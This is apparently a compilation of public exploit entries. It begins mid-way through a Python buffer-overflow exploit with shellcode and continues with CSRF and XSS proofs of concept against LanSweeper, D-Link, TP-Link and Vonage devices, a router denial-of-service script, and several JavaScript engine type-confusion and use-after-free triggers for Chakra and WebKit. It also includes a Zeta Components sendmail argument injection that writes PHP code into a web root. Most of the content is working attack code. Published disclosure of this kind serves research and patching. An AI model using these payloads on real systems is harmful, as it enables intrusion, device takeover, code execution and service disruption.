shellcode += "\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
shellcode += "\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
shellcode += "\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"
# Field contents: 780 filler bytes, the little-endian address of a JMP ESP
# gadget (per the inline comment), a 12-byte NOP sled, the payload, then NOP
# padding to exactly 10000 bytes.  `buffer` shadows the Python 2 builtin.
buffer = "\x41" * 780
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 12
buffer += shellcode
buffer += "\x90" * (10000 - len(buffer))
# POST /login with the buffer in both form fields.
# NOTE(review): the Host header is a hard-coded address rather than `host`,
# and the declared Content-Length (17000) does not match the body actually
# sent (9 + 10000 + 10 + 10000 + 2 = 20021 bytes).
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.228.140\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=" + buffer
evil += "&password=" + buffer + "\r\n"
# Plain TCP; connect() returns None, so `connect` is always None.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
# send() may transmit fewer bytes than requested; its return value is unused.
s.send(evil)
print 'Payload Sent!'
s.close()
LanSweeper - Cross Site Scripting and HTMLi
Title: Vulnerability in LanSweeper
Date: 16-11-2017
Status: Vendor contacted, patch available
Author: Miguel Mendez Z
Vendor Homepage: http://www.lansweeper.com
Version: 6.0.100.75
CVE: CVE-2017-16841
Vulnerability description -------------------------
LanSweeper 6.0.100.75 has XSS via the description parameter to "/Calendar/CalendarActions.aspx".
Take control of the browser using the xss shell or perform malware attacks on users.
Vulnerable variable:
--------------------
"http://victim.com/Calendar/CalendarActions.aspx?action=scheduleinfo&id=2&__VIEWSTATE=&title=Test+Lansweeper&description=XSS/HTMLI&type=1&startdate=13/10/2017&txtStart=19:30&enddate=13/10/2017&txtEnd=21:30&reminder=15&repeattype=1&amount=1&repeatby=0&monthday=1&monthweekday=1&monthweekdayday=1&ends=1&occurrences=15&repeatenddate=&agents={"14":{"id":14,"editAllowed":true}}&teams=&delete=false"
"http://victim.com/Scanning/report.aspx?det=web50accessdeniederrors&title=XSS/HTMLI"
"http://victim.com/Software/report.aspx?det=XSS/HTMLI&title=Linux Software"
Poc:
----
https://www.youtube.com/watch?v=u213EqTSsXQ
# Exploit Title: [D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability]
# Date: [26/03/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/]
# Version: [Tested on DCS-936L with firmware version 1.03. Other versions/models may also be affected]
# Tested on: [DCS-936L with firmware version 1.02.01]
# CVE : [CVE-2017-7851]
==================
#Product:-
==================
Small and unobtrusive, SecuriCam™ IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources.
==================
#Vulnerability:-
==================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability.
========================
#Vulnerability Details:-
========================
=============================================================================================================================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability (CVE-2017-7851)
=============================================================================================================================
D-Link DCS-936L devices with firmware 1.02.01 have CSRF. If a victim is logged into the camera's web console and visits a malicious site hosting a <Target_Device_IP.HTML> from another tab in the same browser, the malicious site can send requests to the victim's device. An attacker can add a new user, replace the firmware image with a malicious one, or connect the victim's device to a rogue Wireless Network.
An attacker can easily find out public IP address of victim's device on Shodan or similar search engines to create <Target_Device_IP.HTML> file. Victim must be logged into the camera's web console and visit attacker's site from another tab in the same browser.
#Proof-of-Concept:-
-------------------
D-Link DCS-936L prevents CSRF attacks by checking the ‘Referer’ header. The ‘Referer’ IP should match the one in the ‘HOST’ header. If it does not, HTTP 403 is returned in the response. However, this device does not perform a strict check on the ‘Referer’ header. It seems to look for the device’s IP address (which is the one in the ‘HOST’ header) anywhere in the ‘Referer’ header. If found, it happily accepts the request.
An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device without having credentials. In a targeted attack, the attacker needs to trick the victim into visiting a malicious site that exploits this vulnerability.
1. Attacker hosts a ‘<target_ip>.html’ on <attacking_ip>
<html>
<body>
<form id="CSRF" action="http://<target_ip>/eng/admin/tools_admin.cgi" method="POST">
<input type="hidden" name="user" value="hacker">
<input type="hidden" name="action" value="set">
<input type="hidden" name="password" value="abc123">
<input type="hidden" name="confirmPassword" value="abc123">
</form>
<script>
window.onload = function(){
document.forms['CSRF'].submit()
}
</script>
</body>
</html>
2. Victim logs into his device.
3. Victim then visits attackers site http://<attacking_ip>/<target_ip>.html
4. The above request adds a new user ‘Hacker’, which reboots the web server.
6. The browser sends the add-new-user request to the target device <target_ip>. The victim's browser sets the 'Referer' header to 'http://<attacking_ip>/<target_ip>.html'. As this contains the IP address of the device (<target_ip>), the request is processed successfully.
7. Server response shows user hacker added successfully:
8. Attacker can now log into the device as hacker/abc123
===================================
#Vulnerability Disclosure Timeline:
===================================
26/03/2017: First email to disclose vulnerability to D-Link incident response team.
26/03/2017: Vendor acknowledged the report.
25/05/2017: Vendor confirmed that development has been completed and it's undergoing security audit.
13/10/2017: Firmware released to production: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_FIRMWARE_v1.05.07.zip
13/11/2017: DCS-936L Firmware Release Notes: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_RELEASE_NOTES_v1.05.07.pdf
15/11/2017: Published CVE-2017-7851
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
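#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
#
# Sends one unauthenticated HTTP GET for a directory path (/Tools/) to the
# router's web server. On affected firmware (2.08UI and prior) this is enough
# to make the device reboot, i.e. a complete denial of service - only run it
# against a device you are authorised to test.
set -u

if [ "$#" -ne 1 ]; then
  echo "usage: $0 <router_ip>" >&2
  exit 1
fi

ROUTER="$1"

# --max-time: the router reboots mid-request, so without a timeout curl may
# hang waiting for a response that never arrives.
curl --max-time 10 "http://${ROUTER}/Tools/"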
# Exploit Title: XSS Vuln - TP-LINK TL-WR740N
# Date: 15/11/2017
# Exploit Author: bl00dy
# Vendor Homepage: http://www.tp-link.com <http://www.tp-link.com.br/>
# Version: TP-LINK TL-WR740N - 3.17.0 Build 140520 Rel.75075n
# Tested on: Windows 8.1
Cross-site scripting (XSS) in TP-LINK TL-WR740N
______________________________________________________
Proof of Concept:
1. Go to your wireless router ip (ex. 192.168.0.1)
2. Go to Wireless and -Wireless MAC Filtering- tab
3. Click Add new button
4. Enter a random MAC address and, in the Description field, enter: <h1>XSS by bl00dy</h1>
5. Click Save; the injected HTML is rendered in the Wireless MAC Filtering tab (stored XSS).
______________________________________________________
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1339
I accidentally found this while trying to reproduce another bug in Edge.
Failed to reproduce on Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.
Tested on Microsoft Edge 40.15063.0.0, Microsoft EdgeHTML 15.15063 (Insider Preview).
Crash Log:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41:
00007fff`e2b7c841 8b0c81 mov ecx,dword ptr [rcx+rax*4] ds:0000023b`4a2ea4c4=????????
0:015> k
# Child-SP RetAddr Call Site
00 000000be`563fbba0 00007fff`e2f52e3e chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41
01 000000be`563fbbf0 00007fff`e2e1f9a4 chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::TryGetValue+0x56
02 000000be`563fbc40 00007fff`e2cb58a9 chakra!Windows::Data::Text::IUnicodeCharactersStatics::`vcall'{144}'+0x58fc4
03 000000be`563fbcf0 00007fff`e2db04c8 chakra!Js::JavascriptObject::ChangePrototype+0x109
04 000000be`563fbd30 00007fff`e2dbe863 chakra!Js::JavascriptObject::EntrySetPrototypeOf+0xc8
05 000000be`563fbd80 00007fff`e2c5dfb8 chakra!amd64_CallFunction+0x93
06 000000be`563fbde0 00007fff`e2c610da chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x158
07 000000be`563fbe80 00007fff`e2c67c61 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xaa
08 000000be`563fbf00 00007fff`e2c6436c chakra!Js::InterpreterStackFrame::ProcessProfiled+0x131
09 000000be`563fbf60 00007fff`e2dc1bfd chakra!Js::InterpreterStackFrame::Process+0x12c
0a 000000be`563fbfc0 00007fff`e2d88cd5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x3bd
0b 000000be`563fc310 0000023a`3c412fc2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 000000be`563fc360 00007fff`e2dbe863 0x0000023a`3c412fc2
0d 000000be`563fc390 00007fff`e2ca6113 chakra!amd64_CallFunction+0x93
0e 000000be`563fc3e0 00007fff`e2c52060 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 000000be`563fc440 00007fff`e2c51167 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
10 000000be`563fc530 00007fff`e2d9ec52 chakra!Js::JavascriptFunction::CallRootFunction+0x4b
11 000000be`563fc5a0 00007fff`e2c50fa4 chakra!ScriptSite::CallRootFunction+0x6a
12 000000be`563fc600 00007fff`e2d30c99 chakra!ScriptSite::Execute+0x124
13 000000be`563fc690 00007fff`e2d31fde chakra!ScriptEngine::ExecutePendingScripts+0x1a5
14 000000be`563fc760 00007fff`e2d32271 chakra!ScriptEngine::ParseScriptTextCore+0x436
15 000000be`563fc8b0 00007fff`da0fe8d5 chakra!ScriptEngine::ParseScriptText+0xb1
16 000000be`563fc960 00007fff`da0fe71e edgehtml!CJScript9Holder::ParseScriptText+0x119
17 000000be`563fca00 00007fff`da0fe237 edgehtml!CScriptCollection::ParseScriptText+0x202
18 000000be`563fcae0 00007fff`da0fdb67 edgehtml!CScriptData::CommitCode+0x357
19 000000be`563fcca0 00007fff`da2c50ad edgehtml!CScriptData::Execute+0x20f
1a 000000be`563fcd50 00007fff`da136ad4 edgehtml!CHtmScriptParseCtx::Execute+0x7d
1b 000000be`563fcd80 00007fff`da135ba1 edgehtml!CHtmParseBase::Execute+0x204
1c 000000be`563fce10 00007fff`da2be8cb edgehtml!CHtmPost::Exec+0x1e1
1d 000000be`563fcff0 00007fff`da2be7af edgehtml!CHtmPost::Run+0x2f
1e 000000be`563fd020 00007fff`da2be663 edgehtml!PostManExecute+0x63
1f 000000be`563fd060 00007fff`da2be4fd edgehtml!PostManResume+0xa3
20 000000be`563fd0a0 00007fff`da2ccfb3 edgehtml!CHtmPost::OnDwnChanCallback+0x3d
21 000000be`563fd0f0 00007fff`da2a4ddb edgehtml!CDwnChan::OnMethodCall+0x23
22 000000be`563fd120 00007fff`da163f46 edgehtml!GWndAsyncTask::Run+0x1b
23 000000be`563fd150 00007fff`da280480 edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
24 000000be`563fd220 00007fff`da2802a3 edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
25 000000be`563fd270 00007fff`da164af3 edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
26 000000be`563fd2d0 00007fff`da162fe5 edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
27 000000be`563fd300 00007fff`fb3dbc50 edgehtml!GlobalWndProc+0x125
PoC:
-->
<script>
// Make the global object (window) the prototype of a fresh object, then
// reload the page. On the tested EdgeHTML 15 build this crashed in
// chakra!JsUtil::WeaklyReferencedKeyDictionary::FindEntry, reached via
// JavascriptObject::ChangePrototype (see the call stack above).
Object.setPrototypeOf({}, this);
location.reload();
</script>
# Exploit Title: Vonage Home Router – Stored Xss
# Date: 16/11/2017
# Exploit Author: Nu11By73
# Hardware Version: VDV-23: 115
# Software Version: 3.2.11-0.9.40
# CVE : CVE-2017-16843
NewKeyword Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the "block these keywords" text box enter: test"><script>alert(1)</script>
5. Click the add keyword button to receive the pop up.
NewDomain Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the "block these websites" text box enter: test"><script>alert(1)</script>
5. Click the add domain button to receive the pop up.
Proof of concept code:
NewDomain.html
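<!-- Note: the x and y values will need to be changed accordingly
     (presumably the submit-button click coordinates the CGI expects;
     the two PoC pages use different values). -->
<!-- Authenticated CSRF: the POST only succeeds if the victim's browser
     already holds a session for 192.168.15.1. The NewDomain value is
     stored and rendered back unescaped on the parental-controls page. -->
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" />
<input type="hidden" name="NewKeyword" value="" />
<input type="hidden" name="KeywordAction" value="0" />
<input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" />
<input type="hidden" name="x" value="50" />
<input type="hidden" name="y" value="15" />
<input type="hidden" name="DomainAction" value="1" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Exploit" />
</form>
</html>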
NewKeyword.html
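<!-- Note: the x and y values will need to be changed accordingly
     (presumably the submit-button click coordinates the CGI expects;
     the two PoC pages use different values). -->
<!-- Authenticated CSRF: the POST only succeeds if the victim's browser
     already holds a session for 192.168.15.1. The NewKeyword value is
     stored and rendered back unescaped on the parental-controls page. -->
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" />
<input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" />
<input type="hidden" name="x" value="61" />
<input type="hidden" name="y" value="12" />
<input type="hidden" name="KeywordAction" value="1" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Enable Service" />
</form>
</html>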
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1341&desc=3
Let's start with a switch statement and its IR code for JIT.
JS:
for (let i = 0; i < 100; i++) {
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IRs before Type Specialization:
s26.var = Ld_A s24.var - "i" #0011 Bailout: #0011 (BailOutExpectingInteger)
BrLt_A $L2, s26.var, s5.var #0070
$L9: #0070
BrGt_A $L2, s26.var, s23.var #0070
$L8: #0070
s28.var = Sub_A s26.var, 2 (0x2).i32 #0070 // Because of the minimum case is 2, subtracting 2 from i. s28 is a temporary variable.
MultiBr ..., s28.var #0070
IRs after Type Specialization:
s52(s26).i32 = Ld_A s51(s24).i32 - "i" #0011
BrLt_I4 $L2, s51(s24).i32, 2 (0x2).i32 #0070
$L9: #0070
BrGt_I4 $L2, s51(s24).i32, 38 (0x26).i32 #0070
$L8: #0070
s53(s28).i32 = Sub_I4 s51(s24).i32, 2 (0x2).i32 #0070
MultiBr ..., s53(s28).i32! #0070
MultiBr instructions' offset operand(s28 in the above) must be of type Int32. If not, type confusion will occur. The way to ensure it is to use BailOutExpectingInteger.
In the above code, "s26" is ensured to be of type Int32 by the bailout. So, the other variables affected by "s26" including the offset variable "s28" are also ensured to be of type Int32.
What I noticed is "s28.var = Sub_A s26.var, 2 (0x2).i32". If we declare a variable "j" with "i - 2", the offset variable "s28" will be replaced with "j" in the CSE phase.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s55(s28).i32 = Sub_I4 s54(s24).i32, 2 (0x2).i32 #0013
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a // BailOutExpectingInteger
BrLt_I4 $L2, s54(s24).i32, 2 (0x2).i32 #0079
BrGt_I4 $L2, s54(s24).i32, 38 (0x26).i32 #0079
MultiBr ..., s55(s28).i32! #0079
The offset variable is replaced with "j" that is not ensured to be of type Int32.
CORRECTION: The bug was that it tried to ensure the type using BailOutExpectingInteger, even if "i" was not always of type Int32. It was bypassed with the CSE phase. So if we created a case where "j" couldn't be of type Int32, type confusion occurred.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 39)
i = 'aaaa';
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s30[LikelyCanBeTaggedValue_Int].var = Sub_A s26[LikelyCanBeTaggedValue_Int_Number].var, 0x1000000000002.var #0013
s27[LikelyCanBeTaggedValue_Int].var = Ld_A s30[isTempLastUse][LikelyCanBeTaggedValue_Int].var! #0017
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a
s63(s26).i32 = FromVar s26[LikelyCanBeTaggedValue_Int_Number].var #001a Bailout: #001a (BailOutExpectingInteger)
BrLt_I4 $L4, s63(s26).i32, 2 (0x2).i32 #0079
BrGt_I4 $L4, s63(s26).i32, 38 (0x26).i32 #0079
MultiBr ..., s27[LikelyCanBeTaggedValue_Int].var #0079
It ended up using "j", a Var, as the offset variable.
PoC:
*/
function opt() {
    // Once JIT-compiled, this loop is expected to hit the CSE bug described
    // above: "j" (a Var) replaces the Int32 temporary "i - 2" that feeds the
    // switch's MultiBr jump table, and BailOutExpectingInteger no longer
    // guards the index that is actually used.
    for (let i = 0; i < 100; i++) {
        let j = i - 2; // same expression the switch lowering computes internally
        switch (i) {
        case 2:
        case 4:
        case 6:
        case 8:
        case 10:
        case 12:
        case 14:
        case 16:
        case 18:
        case 20:
        case 22:
        case 24:
        case 26:
        case 28:
        case 30:
        case 32:
        case 34:
        case 36:
        case 38:
        break;
        }
        // Turning i into a string late in the loop makes "i" (and hence "j")
        // not always Int32, which is what the bailout was supposed to cover.
        // The loop ends here: 'x'++ is NaN, which fails the i < 100 test.
        if (i == 90) {
            i = 'x';
        }
    }
}
function main() {
    // Call opt() repeatedly so the JIT tiers it up; the type confusion fires
    // once the optimised code for opt() runs.
    let calls = 0;
    while (calls < 100) {
        opt();
        calls++;
    }
}
// Run the PoC; the register dump below was taken when opt()'s JIT-compiled
// jump-table dispatch used the Var "j" as the table index.
main();
/*
Crash Log:
RAX: 0x1
RBX: 0x7ffff7e04824 --> 0x100000000
RCX: 0x3
RDX: 0x7ffff0b20667 (loope 0x7ffff0b2066d)
RSI: 0x80000001
RDI: 0x7ffff0c182a0 --> 0x7ffff6478a10 --> 0x7ffff5986230 (<Js::DynamicObject::Finalize(bool)>: push rbp)
RBP: 0x7fffffff2130 --> 0x7fffffff21b0 --> 0x7fffffff2400 --> 0x7fffffff2480 --> 0x7fffffff24d0 --> 0x7fffffff52f0 (--> ...)
RSP: 0x7fffffff20c0 --> 0x1111015500000002
RIP: 0x7ffff0b204da (mov rdx,QWORD PTR [rdx+r13*8])
R8 : 0x0
R9 : 0x0
R10: 0x7ffff0b20400 (movabs rax,0x555555879018)
R11: 0x206
R12: 0x7fffffff5580 --> 0x7ffff0ba0000 --> 0xeb021a471b4f1a4f
R13: 0x1000000000001 << Var 1
R14: 0x1000000000003
R15: 0x7ffff0c79040 --> 0x7ffff643c050 --> 0x7ffff5521130 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff0b204cb: cmp ecx,0x26
0x7ffff0b204ce: jg 0x7ffff0b204e1
0x7ffff0b204d0: movabs rdx,0x7ffff0b20667
=> 0x7ffff0b204da: mov rdx,QWORD PTR [rdx+r13*8]
0x7ffff0b204de: rex.W jmp rdx
We can simply think as follows.
Before the CSE phase:
Var j = ToVar(i - 2);
int32_t offset = i - 2;
jmp jump_table[offset];
After the CSE phase:
Var j = ToVar(i - 2);
jmp jump_table[j];
*/
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343
Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
{
...
if(rightOpnd->IsIntConstOpnd())
{
IntConstType newOffset;
if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
{
offset = newOffset;
rightOpnd = nullptr;
offsetOpnd = nullptr;
}
}
...
if(!rightOpnd)
{
rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
}
}
At (a), it uses "IntConstMath::Add" to check for integer overflow. But IntConstType is pointer-sized, while "offset" is emitted as a 32-bit integer (note the TyInt32 operand created at the end of the snippet), so on a 64-bit system the addition can leave the Int32 range without IntConstMath::Add reporting an overflow.
PoC:
*/
function f() {
    // Small typed array, but the loop index runs up to 0x7fffffff. The
    // pre-increment makes the store index i + 1, so the bound check carries
    // a constant offset - presumably the "offset" that LowerBoundCheck folds
    // into the constant bound without a proper Int32 overflow check.
    // Expect an out-of-bounds access once this loop is JIT-compiled; do not
    // run it in a shell you care about.
    let arr = new Uint32Array(0x1000);
    for (let i = 0; i < 0x7fffffff;) {
        arr[++i] = 0x1234;
    }
}
// Run the PoC; on an affected build this is expected to trigger the unchecked
// bound-check overflow described above rather than exit cleanly.
f();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
The above JavaScript code is JITed as follows:
... CHECKING THE TYPE OF B ...
OP_Memset(a, v, a.length);
b[0] = 2.3023e-320;
But there are no ImplicitCallFlags checks around OP_Memset, so the JIT fails to detect that the type of "b" was changed by an implicit call (in the PoC, v's valueOf) while OP_Memset was running.
The PoC shows that it can result in type confusion.
PoC:
*/
function opt(a, b, v) {
    // Nothing to do unless b has an element 0 to write.
    if (b.length < 1)
        return;
    // Once JIT-compiled this loop becomes a single OP_Memset(a, v, a.length)
    // (see above). Storing v into a typed array converts it via valueOf(),
    // which can run arbitrary JS - including changing b's element kind.
    for (let i = 0; i < a.length; i++)
        a[i] = v;
    // b's type was checked before the memset and is not re-checked here, so
    // this store assumes b is still an array of doubles.
    b[0] = 2.3023e-320;
}
function main() {
    // Warm opt() up with a typed array, a double array and a plain object so
    // the JIT specialises it for those shapes.
    let warmups = 1000;
    while (warmups-- > 0) {
        opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
    }
    const a = new Uint8Array(100);
    const b = [1.1, 2.2, 3.3];
    // poison.valueOf runs inside the memset and changes b[0] from a double to
    // an object; the JIT'd store that follows does not notice.
    const poison = {
        valueOf: () => {
            b[0] = {};
            return 0;
        }
    };
    opt(a, b, poison);
    print(b[0]);
}
// Run the PoC; on an affected build the final print(b[0]) reflects the type
// confusion described above instead of the object that was stored.
main();
Vendor: Zeta Components
module: Mail, <= 1.8.1
Published: November 12th, 2017
Reported by: Kay
CVE-2017-15806
Overview
Zeta Components is a high-quality, general-purpose library of loosely coupled components for developing applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It is possible to exploit this vulnerability to write attacker-controlled content into the web root and thereby execute arbitrary PHP code (and hence shell commands) on the remote server.
Detail
This vulnerability is on send method in ezcMailMtaTransport class.
In /src/transports/mta/mta_transport.php at line 73, send() uses PHP's mail() function to deliver email, and PHP uses sendmail as its default MTA. The fifth parameter of mail(), $additionalParameters, passes extra arguments to the sendmail binary. As the code shows, it is built directly from the return path:
$additionalParameters = "-f{$mail->returnPath->email}";
If an attacker supplies a return-path email address like:
'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'
and injects the payload into the mail body, sendmail will write its trace log (-X) to /var/www/html/cache/exploit.php. The resulting file contains the payload that was passed in the body of the email, which can then be requested and executed via domainname/cache/exploit.php.
In summary, exploitation is possible only if all of these conditions are true:
- you use the ezcMailMtaTransport
- your "sendmail" binary accepts the -X flag, which is not the case for exim4 and postfix, as their sendmail wrappers do not support that argument
- your wwwroot is writable by the user your web server runs as
- the input used for the ezcMailAddress assigned to the returnPath property is not properly escaped
PoC
use Mail\mail;
// The return path is passed to sendmail as "-f<address>" without escaping
// (mta_transport.php line 73), so a space in the address lets extra flags
// through. -X makes sendmail write its trace log to the given path, which
// must be writable by the web server user and reachable under the web root.
$mail = new ezcMail();
$mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
// The body is reproduced in the trace log, so the PHP tag lands in exploit.php.
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);
Remediation
Upgrade Mail to 1.8.2
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367
In the following JavaScript code, both print calls must print "undefined", because "x" is a formal parameter. But the second print call prints "function x() { }". This bug may lead to type confusion in JITed code.
function f(x) {
print(x);
{
function x() {
}
}
print(x);
}
The following code in "PreVisitFunction" is used to decide how to optimize arguments.
bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());
"HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.
function f(x) {
x = 1;
}
PoC:
*/
function f(x) {
    // Touching "arguments" makes the JIT consider the stack-arguments
    // optimisation, which is only meant to be taken when no formal is
    // written to (see doStackArgsOpt above).
    arguments;
    // A block-level function declaration with the same name as the formal:
    // the parser's HasAnyWriteToFormals() does not see this as a write to x,
    // so the optimisation is (wrongly) applied.
    {
        function x() {
        }
    }
}
{
    // Call f() enough times for the JIT to compile it with the (incorrect)
    // stack-arguments optimisation.
    let remaining = 10000;
    while (remaining > 0) {
        f();
        remaining--;
    }
}
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1355
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function jsfuzzer() {
    // Fuzzer-found sequence; the exact order matters. The form's onchange
    // handler (eventhandler2) appends 100 inputs, reallocating the form's
    // associated-elements vector, and FormSubmission::create then reads from
    // the freed storage (see the ASan log). NOTE(review): which of these
    // statements dispatches the change event is not shown on this page -
    // presumably it happens during submit(); confirm before reducing the PoC.
    textarea1.setRangeText("foo");
    textarea2.autofocus = true;
    textarea1.name = "foo";
    form.insertBefore(textarea2, form.firstChild);
    form.submit();
}
function eventhandler2() {
    // Append 100 inputs to the form. Each registerFormElement() insert can
    // grow the form's associated-elements Vector; the ASan "freed by" stack
    // shows the old storage being released here, and FormSubmission::create
    // reads from it afterwards.
    for(var i=0;i<100;i++) {
        var e = document.createElement("input");
        form.appendChild(e);
    }
}
</script>
<body onload=jsfuzzer()>
<form id="form" onchange="eventhandler2()">
